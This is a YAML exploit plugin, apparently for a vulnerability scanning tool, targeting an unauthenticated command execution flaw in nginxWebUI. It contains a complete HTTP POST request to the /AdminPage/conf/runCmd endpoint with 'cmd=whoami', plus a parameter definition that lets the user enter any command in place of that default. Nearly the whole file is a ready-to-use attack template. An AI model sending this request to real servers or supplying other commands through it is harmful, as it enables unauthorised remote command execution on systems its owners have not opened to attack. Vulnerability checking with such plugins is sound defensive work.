info:
    app: nginxWebUI
    name: 未授权执行命令
    author: 小晨曦
    plugin_version: 1.0.0
    disclosure_date: "2023-05-05"
    create_date: "2024-10-08 11:39:28"
    update_date: "2024-10-08 11:39:28"
    vul_id: 1day
    payload: |-
        POST /AdminPage/conf/runCmd HTTP/1.1
        Host: 127.0.0.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Content-Length: 10
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip, deflate
        Connection: close
        
        cmd=whoami
    reference: https://mp.weixin.qq.com/s/kFjf0ot6DkHqxcj0zYX8iw
    vul_type: 命令执行
payloads:
    - name: cmd1
      alias: 命令执行
      params:
          - key: cmd
            title: 命令
            param_type: edit
            default_value: whoami
            required: true
